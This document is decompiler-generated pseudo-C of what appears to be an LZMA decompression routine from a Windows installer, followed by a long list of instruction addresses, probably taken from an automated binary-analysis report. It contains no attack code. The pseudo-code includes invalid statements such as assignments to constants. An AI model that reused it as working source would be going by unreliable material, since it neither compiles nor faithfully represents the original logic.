                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							L142:
                                            							_t561 = _v136;
                                            							goto L143;
                                            						case 6:
                                            							__edx = 0;
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								__eax = _v8;
                                            								__ecx = _v60;
                                            								_v56 = 1;
                                            								_v136 = 7;
                                            								__esi = _v8 + 0x180 + _v60 * 2;
                                            								goto L135;
                                            							}
                                            							__eax = _v96 & 0x000000ff;
                                            							__esi = _v100;
                                            							__cl = 8;
                                            							__cl = 8 - _v64;
                                            							__esi = _v100 & _v28;
                                            							__eax = (_v96 & 0x000000ff) >> 8;
                                            							__ecx = _v64;
                                            							__esi = (_v100 & _v28) << 8;
                                            							__ecx = _v8;
                                            							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                            							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                            							__eflags = _v60 - 4;
                                            							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                            							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                            							if(_v60 >= 4) {
                                            								__eflags = _v60 - 0xa;
                                            								if(_v60 >= 0xa) {
                                            									_t103 =  &_v60;
                                            									 *_t103 = _v60 - 6;
                                            									__eflags =  *_t103;
                                            								} else {
                                            									_v60 = _v60 - 3;
                                            								}
                                            							} else {
                                            								_v60 = 0;
                                            							}
                                            							__eflags = _v56 - __edx;
                                            							if(_v56 == __edx) {
                                            								__ebx = 0;
                                            								__ebx = 1;
                                            								goto L63;
                                            							}
                                            							__eax = _v24;
                                            							__eax = _v24 - _v48;
                                            							__eflags = __eax - _v120;
                                            							if(__eax >= _v120) {
                                            								__eax = __eax + _v120;
                                            								__eflags = __eax;
                                            							}
                                            							__ecx = _v12;
                                            							__ebx = 0;
                                            							__ebx = 1;
                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                            							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                            							goto L43;
                                            						case 7:
                                            							__eflags = _v68 - 1;
                                            							if(_v68 != 1) {
                                            								__eax = _v40;
                                            								_v132 = 0x16;
                                            								_v36 = _v40;
                                            								__eax = _v44;
                                            								_v40 = _v44;
                                            								__eax = _v48;
                                            								_v44 = _v48;
                                            								__eax = 0;
                                            								__eflags = _v60 - 7;
                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            								__al = __al & 0x000000fd;
                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                            								_v60 = (__eflags >= 0) - 1 + 0xa;
                                            								__eax = _v8;
                                            								__eax = _v8 + 0x664;
                                            								__eflags = __eax;
                                            								_v92 = __eax;
                                            								goto L71;
                                            							}
                                            							__eax = _v8;
                                            							__ecx = _v60;
                                            							_v136 = 8;
                                            							__esi = _v8 + 0x198 + _v60 * 2;
                                            							goto L135;
                                            						case 8:
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								__eax = _v8;
                                            								__ecx = _v60;
                                            								_v136 = 0xa;
                                            								__esi = _v8 + 0x1b0 + _v60 * 2;
                                            							} else {
                                            								__eax = _v60;
                                            								__ecx = _v8;
                                            								__eax = _v60 + 0xf;
                                            								_v136 = 9;
                                            								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                            								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                            							}
                                            							goto L135;
                                            						case 9:
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								goto L92;
                                            							}
                                            							__eflags = _v100;
                                            							if(_v100 == 0) {
                                            								goto L174;
                                            							}
                                            							__eax = 0;
                                            							__eflags = _v60 - 7;
                                            							_t264 = _v60 - 7 >= 0;
                                            							__eflags = _t264;
                                            							0 | _t264 = _t264 + _t264 + 9;
                                            							_v60 = _t264 + _t264 + 9;
                                            							goto L78;
                                            						case 0xa:
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								__eax = _v8;
                                            								__ecx = _v60;
                                            								_v136 = 0xb;
                                            								__esi = _v8 + 0x1c8 + _v60 * 2;
                                            								goto L135;
                                            							}
                                            							__eax = _v44;
                                            							goto L91;
                                            						case 0xb:
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								__ecx = _v40;
                                            								__eax = _v36;
                                            								_v36 = _v40;
                                            							} else {
                                            								__eax = _v40;
                                            							}
                                            							__ecx = _v44;
                                            							_v40 = _v44;
                                            							L91:
                                            							__ecx = _v48;
                                            							_v48 = __eax;
                                            							_v44 = _v48;
                                            							L92:
                                            							__eax = _v8;
                                            							_v132 = 0x15;
                                            							__eax = _v8 + 0xa68;
                                            							_v92 = _v8 + 0xa68;
                                            							goto L71;
                                            						case 0xc:
                                            							L102:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 0xc;
                                            								goto L173;
                                            							}
                                            							__ecx = _v116;
                                            							__eax = _v16;
                                            							_v20 = _v20 << 8;
                                            							__ecx =  *_v116 & 0x000000ff;
                                            							_v112 = _v112 - 1;
                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							_t340 =  &_v116;
                                            							 *_t340 = _v116 + 1;
                                            							__eflags =  *_t340;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							__eax = _v48;
                                            							goto L104;
                                            						case 0xd:
                                            							L39:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 0xd;
                                            								goto L173;
                                            							}
                                            							__ecx = _v116;
                                            							__eax = _v16;
                                            							_v20 = _v20 << 8;
                                            							__ecx =  *_v116 & 0x000000ff;
                                            							_v112 = _v112 - 1;
                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							_t127 =  &_v116;
                                            							 *_t127 = _v116 + 1;
                                            							__eflags =  *_t127;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							L41:
                                            							__eax = _v68;
                                            							__eflags = _v76 - _v68;
                                            							if(_v76 != _v68) {
                                            								goto L50;
                                            							}
                                            							__eflags = __ebx - 0x100;
                                            							if(__ebx >= 0x100) {
                                            								goto L56;
                                            							}
                                            							L43:
                                            							__eax = _v95 & 0x000000ff;
                                            							_v95 = _v95 << 1;
                                            							__ecx = _v92;
                                            							__eax = (_v95 & 0x000000ff) >> 7;
                                            							_v76 = __eax;
                                            							__eax = __eax + 1;
                                            							__eax = __eax << 8;
                                            							__eax = __eax + __ebx;
                                            							__esi = _v92 + __eax * 2;
                                            							_v20 = _v20 >> 0xb;
                                            							__ax =  *__esi;
                                            							_v88 = __esi;
                                            							__edx = __ax & 0x0000ffff;
                                            							__ecx = (_v20 >> 0xb) * __edx;
                                            							__eflags = _v16 - __ecx;
                                            							if(_v16 >= __ecx) {
                                            								_v20 = _v20 - __ecx;
                                            								_v16 = _v16 - __ecx;
                                            								__cx = __ax;
                                            								_v68 = 1;
                                            								__cx = __ax >> 5;
                                            								__eflags = __eax;
                                            								__ebx = __ebx + __ebx + 1;
                                            								 *__esi = __ax;
                                            							} else {
                                            								_v68 = _v68 & 0x00000000;
                                            								_v20 = __ecx;
                                            								0x800 = 0x800 - __edx;
                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            								__ebx = __ebx + __ebx;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags = _v20 - 0x1000000;
                                            							_v72 = __ebx;
                                            							if(_v20 >= 0x1000000) {
                                            								goto L41;
                                            							} else {
                                            								goto L39;
                                            							}
                                            						case 0xe:
                                            							L48:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 0xe;
                                            								goto L173;
                                            							}
                                            							__ecx = _v116;
                                            							__eax = _v16;
                                            							_v20 = _v20 << 8;
                                            							__ecx =  *_v116 & 0x000000ff;
                                            							_v112 = _v112 - 1;
                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							_t161 =  &_v116;
                                            							 *_t161 = _v116 + 1;
                                            							__eflags =  *_t161;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							while(1) {
                                            								L50:
                                            								__eflags = __ebx - 0x100;
                                            								if(__ebx >= 0x100) {
                                            									break;
                                            								}
                                            								__eax = _v92;
                                            								__edx = __ebx + __ebx;
                                            								__ecx = _v20;
                                            								__esi = __edx + __eax;
                                            								__ecx = _v20 >> 0xb;
                                            								__ax =  *__esi;
                                            								_v88 = __esi;
                                            								__edi = __ax & 0x0000ffff;
                                            								__ecx = (_v20 >> 0xb) * __edi;
                                            								__eflags = _v16 - __ecx;
                                            								if(_v16 >= __ecx) {
                                            									_v20 = _v20 - __ecx;
                                            									_v16 = _v16 - __ecx;
                                            									__cx = __ax;
                                            									_t175 = __edx + 1; // 0x1
                                            									__ebx = _t175;
                                            									__cx = __ax >> 5;
                                            									__eflags = __eax;
                                            									 *__esi = __ax;
                                            								} else {
                                            									_v20 = __ecx;
                                            									0x800 = 0x800 - __edi;
                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            									__ebx = __ebx + __ebx;
                                            									 *__esi = __cx;
                                            								}
                                            								__eflags = _v20 - 0x1000000;
                                            								_v72 = __ebx;
                                            								if(_v20 >= 0x1000000) {
                                            									continue;
                                            								} else {
                                            									goto L48;
                                            								}
                                            							}
                                            							L56:
                                            							_t178 =  &_v56;
                                            							 *_t178 = _v56 & 0x00000000;
                                            							__eflags =  *_t178;
                                            							goto L57;
                                            						case 0xf:
                                            							L60:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 0xf;
                                            								goto L173;
                                            							}
                                            							__ecx = _v116;
                                            							__eax = _v16;
                                            							_v20 = _v20 << 8;
                                            							__ecx =  *_v116 & 0x000000ff;
                                            							_v112 = _v112 - 1;
                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							_t208 =  &_v116;
                                            							 *_t208 = _v116 + 1;
                                            							__eflags =  *_t208;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							L62:
                                            							__eflags = __ebx - 0x100;
                                            							if(__ebx >= 0x100) {
                                            								L57:
                                            								__al = _v72;
                                            								_v96 = _v72;
                                            								goto L58;
                                            							}
                                            							L63:
                                            							__eax = _v92;
                                            							__edx = __ebx + __ebx;
                                            							__ecx = _v20;
                                            							__esi = __edx + __eax;
                                            							__ecx = _v20 >> 0xb;
                                            							__ax =  *__esi;
                                            							_v88 = __esi;
                                            							__edi = __ax & 0x0000ffff;
                                            							__ecx = (_v20 >> 0xb) * __edi;
                                            							__eflags = _v16 - __ecx;
                                            							if(_v16 >= __ecx) {
                                            								_v20 = _v20 - __ecx;
                                            								_v16 = _v16 - __ecx;
                                            								__cx = __ax;
                                            								_t222 = __edx + 1; // 0x1
                                            								__ebx = _t222;
                                            								__cx = __ax >> 5;
                                            								__eflags = __eax;
                                            								 *__esi = __ax;
                                            							} else {
                                            								_v20 = __ecx;
                                            								0x800 = 0x800 - __edi;
                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            								__ebx = __ebx + __ebx;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags = _v20 - 0x1000000;
                                            							_v72 = __ebx;
                                            							if(_v20 >= 0x1000000) {
                                            								goto L62;
                                            							} else {
                                            								goto L60;
                                            							}
                                            						case 0x10:
                                            							L112:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 0x10;
                                            								goto L173;
                                            							}
                                            							__ecx = _v116;
                                            							__eax = _v16;
                                            							_v20 = _v20 << 8;
                                            							__ecx =  *_v116 & 0x000000ff;
                                            							_v112 = _v112 - 1;
                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							_t371 =  &_v116;
                                            							 *_t371 = _v116 + 1;
                                            							__eflags =  *_t371;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							goto L114;
                                            						case 0x11:
                                            							L71:
                                            							__esi = _v92;
                                            							_v136 = 0x12;
                                            							goto L135;
                                            						case 0x12:
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								__eax = _v92;
                                            								_v136 = 0x13;
                                            								__esi = _v92 + 2;
                                            								L135:
                                            								_v88 = _t626;
                                            								goto L136;
                                            							}
                                            							__eax = _v80;
                                            							_v52 = _v52 & 0x00000000;
                                            							__ecx = _v92;
                                            							__eax = _v80 << 4;
                                            							__eflags = __eax;
                                            							__eax = _v92 + __eax + 4;
                                            							goto L133;
                                            						case 0x13:
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								_t475 =  &_v92;
                                            								 *_t475 = _v92 + 0x204;
                                            								__eflags =  *_t475;
                                            								_v52 = 0x10;
                                            								_v68 = 8;
                                            								L147:
                                            								_v128 = 0x14;
                                            								goto L148;
                                            							}
                                            							__eax = _v80;
                                            							__ecx = _v92;
                                            							__eax = _v80 << 4;
                                            							_v52 = 8;
                                            							__eax = _v92 + (_v80 << 4) + 0x104;
                                            							L133:
                                            							_v92 = __eax;
                                            							_v68 = 3;
                                            							goto L147;
                                            						case 0x14:
                                            							_v52 = _v52 + __ebx;
                                            							__eax = _v132;
                                            							goto L143;
                                            						case 0x15:
                                            							__eax = 0;
                                            							__eflags = _v60 - 7;
                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            							__al = __al & 0x000000fd;
                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                            							_v60 = (__eflags >= 0) - 1 + 0xb;
                                            							goto L123;
                                            						case 0x16:
                                            							__eax = _v52;
                                            							__eflags = __eax - 4;
                                            							if(__eax >= 4) {
                                            								_push(3);
                                            								_pop(__eax);
                                            							}
                                            							__ecx = _v8;
                                            							_v68 = 6;
                                            							__eax = __eax << 7;
                                            							_v128 = 0x19;
                                            							_v92 = __eax;
                                            							goto L148;
                                            						case 0x17:
                                            							L148:
                                            							__eax = _v68;
                                            							_v84 = 1;
                                            							_v76 = _v68;
                                            							goto L152;
                                            						case 0x18:
                                            							L149:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 0x18;
                                            								goto L173;
                                            							}
                                            							__ecx = _v116;
                                            							__eax = _v16;
                                            							_v20 = _v20 << 8;
                                            							__ecx =  *_v116 & 0x000000ff;
                                            							_v112 = _v112 - 1;
                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							_t490 =  &_v116;
                                            							 *_t490 = _v116 + 1;
                                            							__eflags =  *_t490;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							L151:
                                            							_t493 =  &_v76;
                                            							 *_t493 = _v76 - 1;
                                            							__eflags =  *_t493;
                                            							L152:
                                            							__eflags = _v76;
                                            							if(_v76 <= 0) {
                                            								__ecx = _v68;
                                            								__ebx = _v84;
                                            								0 = 1;
                                            								__eax = 1 << __cl;
                                            								__ebx = _v84 - (1 << __cl);
                                            								__eax = _v128;
                                            								_v72 = __ebx;
                                            								L143:
                                            								_v140 = _t561;
                                            								goto L3;
                                            							}
                                            							__eax = _v84;
                                            							_v20 = _v20 >> 0xb;
                                            							__edx = _v84 + _v84;
                                            							__eax = _v92;
                                            							__esi = __edx + __eax;
                                            							_v88 = __esi;
                                            							__ax =  *__esi;
                                            							__edi = __ax & 0x0000ffff;
                                            							__ecx = (_v20 >> 0xb) * __edi;
                                            							__eflags = _v16 - __ecx;
                                            							if(_v16 >= __ecx) {
                                            								_v20 = _v20 - __ecx;
                                            								_v16 = _v16 - __ecx;
                                            								__cx = __ax;
                                            								__cx = __ax >> 5;
                                            								__eax = __eax - __ecx;
                                            								__edx = __edx + 1;
                                            								__eflags = __edx;
                                            								 *__esi = __ax;
                                            								_v84 = __edx;
                                            							} else {
                                            								_v20 = __ecx;
                                            								0x800 = 0x800 - __edi;
                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            								_v84 = _v84 << 1;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags = _v20 - 0x1000000;
                                            							if(_v20 >= 0x1000000) {
                                            								goto L151;
                                            							} else {
                                            								goto L149;
                                            							}
                                            						case 0x19:
                                            							__eflags = __ebx - 4;
                                            							if(__ebx < 4) {
                                            								_v48 = __ebx;
                                            								L122:
                                            								_t399 =  &_v48;
                                            								 *_t399 = _v48 + 1;
                                            								__eflags =  *_t399;
                                            								L123:
                                            								__eax = _v48;
                                            								__eflags = __eax;
                                            								if(__eax == 0) {
                                            									_v52 = _v52 | 0xffffffff;
                                            									goto L173;
                                            								}
                                            								__eflags = __eax - _v100;
                                            								if(__eax > _v100) {
                                            									goto L174;
                                            								}
                                            								_v52 = _v52 + 2;
                                            								__eax = _v52;
                                            								_t406 =  &_v100;
                                            								 *_t406 = _v100 + _v52;
                                            								__eflags =  *_t406;
                                            								goto L126;
                                            							}
                                            							__ecx = __ebx;
                                            							__eax = __ebx;
                                            							__ecx = __ebx >> 1;
                                            							__eax = __ebx & 0x00000001;
                                            							__ecx = (__ebx >> 1) - 1;
                                            							__al = __al | 0x00000002;
                                            							__eax = (__ebx & 0x00000001) << __cl;
                                            							__eflags = __ebx - 0xe;
                                            							_v48 = __eax;
                                            							if(__ebx >= 0xe) {
                                            								__ebx = 0;
                                            								_v76 = __ecx;
                                            								L105:
                                            								__eflags = _v76;
                                            								if(_v76 <= 0) {
                                            									__eax = __eax + __ebx;
                                            									_v68 = 4;
                                            									_v48 = __eax;
                                            									__eax = _v8;
                                            									__eax = _v8 + 0x644;
                                            									__eflags = __eax;
                                            									L111:
                                            									__ebx = 0;
                                            									_v92 = __eax;
                                            									_v84 = 1;
                                            									_v72 = 0;
                                            									_v76 = 0;
                                            									L115:
                                            									__eax = _v68;
                                            									__eflags = _v76 - _v68;
                                            									if(_v76 >= _v68) {
                                            										_t397 =  &_v48;
                                            										 *_t397 = _v48 + __ebx;
                                            										__eflags =  *_t397;
                                            										goto L122;
                                            									}
                                            									__eax = _v84;
                                            									_v20 = _v20 >> 0xb;
                                            									__edi = _v84 + _v84;
                                            									__eax = _v92;
                                            									__esi = __edi + __eax;
                                            									_v88 = __esi;
                                            									__ax =  *__esi;
                                            									__ecx = __ax & 0x0000ffff;
                                            									__edx = (_v20 >> 0xb) * __ecx;
                                            									__eflags = _v16 - __edx;
                                            									if(_v16 >= __edx) {
                                            										__ecx = 0;
                                            										_v20 = _v20 - __edx;
                                            										__ecx = 1;
                                            										_v16 = _v16 - __edx;
                                            										__ebx = 1;
                                            										__ecx = _v76;
                                            										__ebx = 1 << __cl;
                                            										__ecx = 1 << __cl;
                                            										__ebx = _v72;
                                            										__ebx = _v72 | __ecx;
                                            										__cx = __ax;
                                            										__cx = __ax >> 5;
                                            										__eax = __eax - __ecx;
                                            										__edi = __edi + 1;
                                            										__eflags = __edi;
                                            										_v72 = __ebx;
                                            										 *__esi = __ax;
                                            										_v84 = __edi;
                                            									} else {
                                            										_v20 = __edx;
                                            										0x800 = 0x800 - __ecx;
                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            										_v84 = _v84 << 1;
                                            										 *__esi = __dx;
                                            									}
                                            									__eflags = _v20 - 0x1000000;
                                            									if(_v20 >= 0x1000000) {
                                            										L114:
                                            										_t374 =  &_v76;
                                            										 *_t374 = _v76 + 1;
                                            										__eflags =  *_t374;
                                            										goto L115;
                                            									} else {
                                            										goto L112;
                                            									}
                                            								}
                                            								__ecx = _v16;
                                            								__ebx = __ebx + __ebx;
                                            								_v20 = _v20 >> 1;
                                            								__eflags = _v16 - _v20;
                                            								_v72 = __ebx;
                                            								if(_v16 >= _v20) {
                                            									__ecx = _v20;
                                            									_v16 = _v16 - _v20;
                                            									__ebx = __ebx | 0x00000001;
                                            									__eflags = __ebx;
                                            									_v72 = __ebx;
                                            								}
                                            								__eflags = _v20 - 0x1000000;
                                            								if(_v20 >= 0x1000000) {
                                            									L104:
                                            									_t344 =  &_v76;
                                            									 *_t344 = _v76 - 1;
                                            									__eflags =  *_t344;
                                            									goto L105;
                                            								} else {
                                            									goto L102;
                                            								}
                                            							}
                                            							__edx = _v8;
                                            							__eax = __eax - __ebx;
                                            							_v68 = __ecx;
                                            							__eax = _v8 + 0x55e + __eax * 2;
                                            							goto L111;
                                            						case 0x1a:
                                            							L58:
                                            							__eflags = _v104;
                                            							if(_v104 == 0) {
                                            								_v140 = 0x1a;
                                            								goto L173;
                                            							}
                                            							__ecx = _v108;
                                            							__al = _v96;
                                            							__edx = _v12;
                                            							_v100 = _v100 + 1;
                                            							_v108 = _v108 + 1;
                                            							_v104 = _v104 - 1;
                                            							 *_v108 = __al;
                                            							__ecx = _v24;
                                            							 *(_v12 + __ecx) = __al;
                                            							__eax = __ecx + 1;
                                            							__edx = 0;
                                            							_t197 = __eax % _v120;
                                            							__eax = __eax / _v120;
                                            							__edx = _t197;
                                            							goto L82;
                                            						case 0x1b:
                                            							L78:
                                            							__eflags = _v104;
                                            							if(_v104 == 0) {
                                            								_v140 = 0x1b;
                                            								goto L173;
                                            							}
                                            							__eax = _v24;
                                            							__eax = _v24 - _v48;
                                            							__eflags = __eax - _v120;
                                            							if(__eax >= _v120) {
                                            								__eax = __eax + _v120;
                                            								__eflags = __eax;
                                            							}
                                            							__edx = _v12;
                                            							__cl =  *(__edx + __eax);
                                            							__eax = _v24;
                                            							_v96 = __cl;
                                            							 *(__edx + __eax) = __cl;
                                            							__eax = __eax + 1;
                                            							__edx = 0;
                                            							_t280 = __eax % _v120;
                                            							__eax = __eax / _v120;
                                            							__edx = _t280;
                                            							__eax = _v108;
                                            							_v100 = _v100 + 1;
                                            							_v108 = _v108 + 1;
                                            							_t289 =  &_v104;
                                            							 *_t289 = _v104 - 1;
                                            							__eflags =  *_t289;
                                            							 *_v108 = __cl;
                                            							L82:
                                            							_v24 = __edx;
                                            							goto L83;
                                            						case 0x1c:
                                            							while(1) {
                                            								L126:
                                            								__eflags = _v104;
                                            								if(_v104 == 0) {
                                            									break;
                                            								}
                                            								__eax = _v24;
                                            								__eax = _v24 - _v48;
                                            								__eflags = __eax - _v120;
                                            								if(__eax >= _v120) {
                                            									__eax = __eax + _v120;
                                            									__eflags = __eax;
                                            								}
                                            								__edx = _v12;
                                            								__cl =  *(__edx + __eax);
                                            								__eax = _v24;
                                            								_v96 = __cl;
                                            								 *(__edx + __eax) = __cl;
                                            								__eax = __eax + 1;
                                            								__edx = 0;
                                            								_t420 = __eax % _v120;
                                            								__eax = __eax / _v120;
                                            								__edx = _t420;
                                            								__eax = _v108;
                                            								_v108 = _v108 + 1;
                                            								_v104 = _v104 - 1;
                                            								_v52 = _v52 - 1;
                                            								__eflags = _v52;
                                            								 *_v108 = __cl;
                                            								_v24 = _t420;
                                            								if(_v52 > 0) {
                                            									continue;
                                            								} else {
                                            									L83:
                                            									_v140 = 2;
                                            									goto L3;
                                            								}
                                            							}
                                            							_v140 = 0x1c;
                                            							L173:
                                            							_push(0x22);
                                            							_pop(_t574);
                                            							memcpy(_v148,  &_v140, _t574 << 2);
                                            							return 0;
                                            					}
                                            				}
                                            				L174:
                                            				_t538 = _t537 | 0xffffffff;
                                            				return _t538;
                                            			}

                                            0x004064cb
                                            0x004064cb
                                            0x004064ce
                                            0x00000000
                                            0x00000000
                                            0x0040680a
                                            0x0040680e
                                            0x00406830
                                            0x00406833
                                            0x0040683d
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681d
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x004068fe
                                            0x004068fe
                                            0x00000000
                                            0x004068fe
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613
                                            0x00406614
                                            0x00406617
                                            0x0040661e
                                            0x00406621
                                            0x0040662f
                                            0x00000000
                                            0x00000000
                                            0x00406905
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x00000000
                                            0x00000000
                                            0x00406914
                                            0x00406914
                                            0x00406918
                                            0x00406a50
                                            0x00000000
                                            0x00406a50
                                            0x0040691e
                                            0x00406921
                                            0x00406924
                                            0x00406928
                                            0x0040692b
                                            0x00406931
                                            0x00406933
                                            0x00406933
                                            0x00406933
                                            0x00406936
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x0040693c
                                            0x0040693c
                                            0x00406940
                                            0x004069a0
                                            0x004069a3
                                            0x004069a8
                                            0x004069a9
                                            0x004069ab
                                            0x004069ad
                                            0x004069b0
                                            0x004068bc
                                            0x004068bc
                                            0x00000000
                                            0x004068bc
                                            0x00406942
                                            0x00406948
                                            0x0040694b
                                            0x0040694e
                                            0x00406951
                                            0x00406954
                                            0x00406957
                                            0x0040695a
                                            0x0040695d
                                            0x00406960
                                            0x00406963
                                            0x0040697c
                                            0x0040697f
                                            0x00406982
                                            0x00406985
                                            0x00406989
                                            0x0040698b
                                            0x0040698b
                                            0x0040698c
                                            0x0040698f
                                            0x00406965
                                            0x00406965
                                            0x0040696d
                                            0x00406972
                                            0x00406974
                                            0x00406977
                                            0x00406977
                                            0x00406992
                                            0x00406999
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
                                            0x004066a3
                                            0x004066a7
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x004063b9
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x00000000
                                            0x00000000
                                            0x00406544
                                            0x00406544
                                            0x00406548
                                            0x00406a0e
                                            0x00000000
                                            0x00406a0e
                                            0x0040654e
                                            0x00406551
                                            0x00406554
                                            0x00406557
                                            0x00406559
                                            0x00406559
                                            0x00406559
